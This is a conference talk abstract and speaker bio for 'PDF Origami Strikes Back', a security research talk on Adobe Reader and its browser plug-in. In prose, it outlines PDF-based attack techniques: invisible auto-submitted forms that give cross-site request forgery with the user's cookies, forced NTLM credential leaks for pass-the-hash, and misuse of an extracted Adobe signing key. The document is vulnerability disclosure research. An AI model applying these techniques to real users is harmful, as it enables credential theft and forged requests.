Damien Aumaitre (Sogeti)

Presentation Title PDF Origami Strikes Back
Presentation Abstract

Last year, we presented at PacSec some risks related to the PDF format. Many samples were provided. In the end, we showed 2 real-life attacks focused on PDF language and Acrobat Reader [1].

Since the language has now well be studied, we will focus now on its environment:

- What with Adobe Reader and other products related to PDF? What are the links with the OS, the browser, …?
- How PDF files can help an attacker to improve his operations?

Regarding Adobe and PDF, we have mainly focused on the Reader, and Adobe’s plug-in. The Reader is a really big software (300Mb) with lots of dependencies (plug-ins, dll, executables) making it a mess to analyze. We have start to sort all that mess trying to isolate the various features. One interesting feature is the usage made of the cryptography, either for ciphering or granting extended permissions based on signature (what Adobe calls “certification” and “usage rights”).

Our current status on crypto is:

- The new ciphering mode is a better target to an attacker for a password shorter than 32 characters.
- Adobe’s private key we extracted last year is still working to grant “usage rights” but PDF signed by it have an invalid signature now: this has to be investigated.

We are also focusing on Adobe’s plug-in to read PDF files. First, the now famous JavaScript engine will be studied. It is based on an old SpiderMonkey engine, modified to support PDF features. However, the most recent documentations are related to version 8 of Reader, whereas the current one is 9. Many information are not reliable or even not at all in the documentation. So, we have extracted undocumented functions. But JavaScript is one action among many in PDF. So, we also have looked at how some others actions behave in the plug-in (mainly Launch, URI, SubmitForm and GoToR). The main feature for an attacker is that they dont throw an alert when connecting to a remote site since it is a normal behavior in a browser (conversely to what happen when these actions are called in the standalone reader).

Currently, our main result is on credential leaks:

- When a PDF contains a invisible form, automatically submitted, it is then passed to the browser, which send the form … and the cookies related to it if the user was previously authenticated on the target site. Thus cross-site request forgeries are possible with PDF files.

- On a LAN, it is possible to cause Windows to force a NTLM challenge and thus leak the NTLM credentials with no warning at all for the user. Thus PDF files are a really good way to success a “pass the hash” attack.

About Damien Aumaitre

Damien Aumaitre is working at the Software security research and development team at Sogeti since 3 years. He has been working on low level PCI and firewire, Windows kernel internals.

** Note: Presenting with Frédéric Raynal (Head of Research & Software Development, Sogeti/Cap Gemini) and Guillaume Delugré (Sogeti)